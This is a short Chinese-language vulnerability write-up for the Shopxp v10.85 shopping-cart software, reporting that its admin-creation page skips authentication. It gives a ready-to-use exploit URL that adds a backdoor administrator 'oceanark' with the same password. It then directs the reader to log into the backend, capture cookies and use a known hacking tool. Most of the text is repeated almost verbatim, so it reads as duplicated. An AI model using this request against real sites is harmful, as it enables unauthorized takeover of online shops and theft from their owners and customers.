影响版本:Shopxp-v10.85
官方网站: http://www.shopxp.cn
漏洞类型:验证错误
漏洞描述:savexpadmin.asp添加管理员页未进行身份验证。
利用方法:外部提交数据
http://127.0.0.1/admin/savexpadmin.asp?action=add&admin2=oceanark&password2=oceanark&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1
增加用户: oceanark 密码为 oceanark 的用户
登入后台:
http://127.0.0.1/upfilepic_getimg.asp
抓取cookies使用明小子动感购物商城提交
官方网站: http://www.shopxp.cn
漏洞类型:验证错误
漏洞描述:savexpadmin.asp添加管理员页未进行身份验证。
利用方法:外部提交数据
http://127.0.0.1/admin/savexpadmin.asp?action=add&admin2=oceanark&password2=oceanark&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1
增加用户: oceanark 密码为 oceanark 的用户
登入后台:
http://127.0.0.1/upfilepic_getimg.asp
抓取cookies使用明小子动感购物商城提交